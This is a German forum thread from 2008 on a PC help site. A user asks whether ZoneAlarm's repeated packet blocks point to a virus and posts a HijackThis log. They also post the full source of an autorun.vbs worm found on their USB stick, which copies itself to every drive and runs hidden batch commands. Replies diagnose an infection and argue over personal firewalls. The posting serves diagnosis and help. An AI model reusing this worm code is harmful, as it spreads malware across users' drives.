Computerhilfen:

Welcome to Computerhilfen.de, your free pc help site. Please take a look at our english website at www.computerhilfen.com where you find tips and help in english and can also ask questions in our english help board.

close
Computerhilfen.nl: Hulp: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus? (S. 1 / 3)



 



ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus?


(gelezen 513 keer - 0 geregistreerde leden en 1 gast bekijken dit topic.)
 Antwoord E-mail dit topic Print Anmelden / Register

Internet-Sicherheit » ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus?

Pagina's: [1] 2 3

le Cauchemar Offline
Sr. Starter (2)
*

ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus?

« Gepost op: 06.09.08, 23:46:52 »



Guten Tag,

Ich habe ZoneAlarm Pro, Windows XP.
Als ich das Programm etwas durchstöberte, fand ich folgendes Protokoll, das ca. alle 10 Sekunden einen neuen Eintrag bekommt:

Bild-URL: http://img95.imageshack.us/img95/5239/unbenannt1kj1.jpg

Die Anti-Spyware-Prüfung des Programmes brachte keine Ergebnisse.

Ich dachte erst, das sei ein Virus, aber dann habe ich mir die IPs genauer angesehen:
Ich benutze eine Fritzbox, die über LAN mit meinem PC verbunden ist.
Unter LAN-Verbindungen>>Netzwerkunterstützung habe ich meine IP gefunden.
Das ist die Ziel-IP des Protokolls, die auf ***.***.**8.22 endet.
Die Quell-IP ist die gleiche, nur endet sie auf ***.***.**8.1
Ist das etwa ein ganz normales Lebenszeichen meines Fritzbox-Routers?

Ich bedanke mich schonmal für alle Antworten.
Ich bin nicht gerade ein Profi in dem Thema ^^
Sollte eine wichtige Information fehlen, um das zu klären, sagt Bescheid.   
« Laatste verandering: 07.09.08, 00:01:39 door le Cauchemar » Meld dit bericht aan de moderator   Gelogd



w
Gast

Re: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Vi

« Antwoord #1 Gepost op: 07.09.08, 08:26:23 »


Das ZA sinnfrei ist,dürfte hinlänglich bekannt sein.Einfach vom system werfen und gut ist.
nur zur info:
http://www.heise.de/foren/S-Re-Erfahrung-mit-Personal-Firewall-CORE-FORCE/forum-7305/msg-14855227/read/
Meld dit bericht aan de moderator   Gelogd


copy Offline copys PC
Sr. Member Pro (2.346)
*****

Re: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus?

« Antwoord #2 Gepost op: 07.09.08, 11:06:34 »


..also normal ist es auf jedenfall nicht!
Hast du dort schon mal bei Programmeinstellungen geschaut, lösch dort alle die du nicht brauchst und beachte bei anderen deren Freigabe.
www.hijackthis.de mal zur Sicherheit.  
« Laatste verandering: 07.09.08, 11:08:28 door copy » Meld dit bericht aan de moderator   Gelogd


Zidane
Gast

Re: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus?

« Antwoord #3 Gepost op: 07.09.08, 12:38:03 »


ZoneAlarm entfernen...Windows Firewall reicht aus.
mit HJT ein LOG erstellen und hier rein posten
 
Meld dit bericht aan de moderator   Gelogd


le Cauchemar Offline
Sr. Starter (2)
*

Re: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Vi

« Antwoord #4 Gepost op: 15.09.08, 19:05:46 »


OK, vielen Dank erstmal bis hierhin  Smiley
Mein HJT-Log:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 18:59:48, on 15.09.2008
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\VTTimer.exe
C:\WINDOWS\System32\S3trayp.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Programme\Zone Labs\ZoneAlarm\zlclient.exe
C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe
C:\Programme\Java\jre1.6.0_05\bin\jusched.exe
C:\Programme\Lexmark 2300 Series\lxcgmon.exe
C:\Programme\Lexmark 2300 Series\ezprint.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Programme\Messenger\msmsgs.exe
C:\Programme\Google\Google Updater\GoogleUpdater.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\FRITZ!DSL\IGDCTRL.EXE
C:\Programme\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\lxcgcoms.exe
C:\Programme\Mozilla Firefox\firefox.exe
C:\Programme\ICQLite\ICQLite.exe
C:\Programme\Real\RealPlayer\RealPlay.exe
C:\Programme\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.de/
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Programme\Google\GoogleToolbarNotifier\2.1.615.5858\swg.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [VTTimer] VTTimer.exe
O4 - HKLM\..\Run: [S3Trayp] S3trayp.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Programme\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe"  -osboot
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Programme\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [lxcgmon.exe] "C:\Programme\Lexmark 2300 Series\lxcgmon.exe"
O4 - HKLM\..\Run: [EzPrint] "C:\Programme\Lexmark 2300 Series\ezprint.exe"
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Programme\Messenger\msmsgs.exe" /background
O4 - HKCU\..\RunOnce: [ICQ Lite] C:\Programme\ICQLite\ICQLite.exe -trayboot
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'LOKALER DIENST')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'NETZWERKDIENST')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Google Updater.lnk = C:\Programme\Google\Google Updater\GoogleUpdater.exe
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Programme\ICQLite\ICQLite.exe
O9 - Extra 'Tools' menuitem: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Programme\ICQLite\ICQLite.exe
O23 - Service: AVM IGD CTRL Service - AVM Berlin - C:\Programme\FRITZ!DSL\IGDCTRL.EXE
O23 - Service: AVM FRITZ!web Routing Service (de_serv) - AVM Berlin - C:\Programme\Gemeinsame Dateien\AVM\de_serv.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Programme\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: lxcg_device -   - C:\WINDOWS\System32\lxcgcoms.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe

--
End of file - 4029 bytes

Hmm..Internet Explorer ist angeblich schädlich.
Ich glaube, ich habe den (das Original) nicht einmal installiert...
Wie sollte ich jetzt vorgehen?


Habe gerade auf meinem USB-Stick eine Autorun.vbs entdeckt  Shocked
Bevor ich ihn vor 5 Minuten angeschlossen habe, war die Datei nicht drauf  Sad
Habe die Datei mal gelöscht und den Inhalt in einer txt-Datei mit neutralem Namen gespeichert, um ihn hier zu posten:

Citaat
rem autorun·ç±©
on error resume next
Set WshShell =CreateObject("WScript.Shell")

if Year(Date)=2030 and Month(Date)=6 and Day(Date)=30 then
a=WshShell.Run("autorun.bat Over" ,0,True)
Set Of = CreateObject("Scripting.FileSystemObject")
Set fc = Of.OpenTextFile("C:\autorun.txt", 1)
mt = fc.ReadAll
fc.Close
if mt<>"" then msgbox decrypt(mt)
end if

if Year(Date)>2030 or Month(Date)>100 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.*",d&"\",True
else
Of.CopyFile "autorun.*",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.*",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if

function decrypt(dcode)
   dim texts
   dim i
   for i=1 to len(dcode)-4
   x=i mod 5
   texts=texts & chr(asc(mid(dcode,i,1))-x)
   next
   decrypt=texts
end function
Wenn diese Zeilen hier unerwünscht sind, werde ich (oder ein Moderator - kommt drauf an, wer schneller ist) sie natürlich entfernen. 
« Laatste verandering: 15.09.08, 19:10:46 door le Cauchemar » Meld dit bericht aan de moderator   Gelogd


Zidane
Gast

Re: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus?

« Antwoord #5 Gepost op: 15.09.08, 20:32:58 »


HJT LOG ist sauber
system updaten auf SP3
das du mit SP1 rumsurfst ist schon gefährlich genug
und ZoneAlarm entfernen
Meld dit bericht aan de moderator   Gelogd


w
Gast

Re: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Vi

« Antwoord #6 Gepost op: 16.09.08, 04:02:34 »


System vom Internet trennen,Du hast eine Virus oder trojaner Dir per USB eingeschlept.Die vbs datei war ein bestandteil dieses virus.
System von sauberem medium Booten,und untersuchen.Je nach art des schädlings ist manuelles entfernen ausreichend,ansonsten neuinstalation.
Meld dit bericht aan de moderator   Gelogd


CallBack Offline CallBacks PC
Full Member (126)
***

Re: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus?

« Antwoord #7 Gepost op: 16.09.08, 08:07:44 »


Hallo,
also ich bin mit ZA voll zufrieden. Zig Tausend Rechner versuchen in andere Rechner einzudringen und das ununterbrochen 24 Std. am Tag, 7 Tage die Woche, 365 Tage im Jahr. Warum sollte sonst ZA Anfragen blocken, tja, das ist doch der Sinn einer Firewall und ich kann mir gut vorstellen, dass solche Versuche alle 10 Sec. stattfinden können. Bei einem Test der Firewall auf www.com-magazin.de habe ich festgestellt, dass ZA die wichtigen Ports geschlossen oder versteckt hat, also keine Angriffspunkte für Eindringlinge, genauso, wie es eine Firewall machen sollte...

mfg
CallBack
Meld dit bericht aan de moderator   Gelogd


Zidane
Gast

Re: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus?

« Antwoord #8 Gepost op: 16.09.08, 08:56:13 »


du hasst den sinn einer personal firewall nicht verstanden...
(lies mal hier zb http://www.team-cauchy.de/personal/)

eine Hardware Firewall kann niemals durch eine Software Firewall ersetzt werden....

mit deiner Windows Firewall hasst du mehr schutz
als mit einer PFW...

eine PFW kann man leicht aushebeln...
und was wichtiger ist eine PFW schützt nicht nein...sie ist ein sicherheitsrisiko....

aber lass dich ruhig weiter von den herstellern solcher software ver....en.

mfg Zidane
Meld dit bericht aan de moderator   Gelogd


CallBack Offline CallBacks PC
Full Member (126)
***

Re: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus?

« Antwoord #9 Gepost op: 16.09.08, 09:06:26 »


Hallo,
ach komm, ganz so sinnlos kann es nicht sein...und ich zahle nix für Programme, lediglich das BS lass ich mich etwas kosten....aber ich lass Dir deine Meinung...

mfg
CallBack
Meld dit bericht aan de moderator   Gelogd


HCK Offline
Sr. Member Pro (25.400)
*****

Re: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus?

« Antwoord #10 Gepost op: 16.09.08, 14:19:29 »


seitdem ich einen Router MIT HW-FW habe , ist ZA ... gestorben ...
macht viel Aufregung um nix,bei sensibler Einstellung wird jeder Ping usw bemeckert .
Meld dit bericht aan de moderator   Gelogd


CallBack Offline CallBacks PC
Full Member (126)
***

Re: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus?

« Antwoord #11 Gepost op: 16.09.08, 21:06:53 »


Hallo,
naja, ich wills mal so ausdrücken, mit der Firewall fühle ich mich sicherer, ob es objektiv auch so ist, kann ich nicht so genau sagen, schliesslich bin ich kein Sicherheits Experte..., aber die bisher durchgeführten Tests bestätigen mich darin, dass ich mich auch sicherer fühlen kann...Smiley

mfg
CallBack
Meld dit bericht aan de moderator   Gelogd


copy Offline copys PC
Sr. Member Pro (2.346)
*****

Re: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus?

« Antwoord #12 Gepost op: 16.09.08, 22:00:40 »


..vieleicht bin ich damit ein Beispiel, aber kein Gutes.
..hab meine Vista Firewall off und die Zone drauf.
Mal sehen was passiert, werde es Reumütig und für die Sicherheit anderer, hier oder in einem neuem Threat posten! Engel
Meld dit bericht aan de moderator   Gelogd


Zidane
Gast

Re: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus?

« Antwoord #13 Gepost op: 16.09.08, 22:09:00 »


@copy
ooo neinnn nicht du auch noch Roll Eyes...muss es den erst zu einem schädlings befall kommen
bevor du was dagegen tust sprich ZA entfernst...zum testen tue doch in einer virutelen umgeben das testen
zb mit Virtualbox...
leider weiß ich nicht wo man die viren runterladen kann  Cool

aber am arbeits rechner solltest du ZA nicht benutzen
das hasst du schon wahrscheinlich tausendmal gehört aber naja ist nur ein gut gemeinter rat
um keine schädlings befall zu bekommen

ich hoffe du machst da was bezüglich ZA (zb entfernen  Wink)

mfg Zidane
Meld dit bericht aan de moderator   Gelogd


copy Offline copys PC
Sr. Member Pro (2.346)
*****

Re: ZoneAlarm blockiert alle 10 Sekunden Pakete - Normal, oder habe ich einen Virus?

« Antwoord #14 Gepost op: 16.09.08, 22:22:20 »


..die Zone hab ich seit 3 Jahren und die hat mich noch nie verlassen!!..
Damit glaube ich wovon ich spreche und ich bin treu!
Meld dit bericht aan de moderator   Gelogd

Pagina's: [1] 2 3  Antwoord E-mail dit topic Print Anmelden / Register 



Ähnliche Themen:
Video: Asus EeePC bootet XP in 14 Sekunden
Windows XP: C&C stockt alle 10 sekunden habe einen Quadcore brauche Hilfe
ich glaub ich habe oder hatte einen virus
Virus blockiert alle scanner
Virus oder doch normal ...?
Brauche ich avast wenn ich ZoneAlarm habe, oder umgekehrt?

add bookmark Bookmark:
Ga naar:  
Sicherheit-Forum am 06.09.2008 | | Mobile Version (Handy, PDA)




Computerhilfen.nl | Powered by SMF 2.5.1.
© 2001-2008, Lewis Media. All Rights Reserved.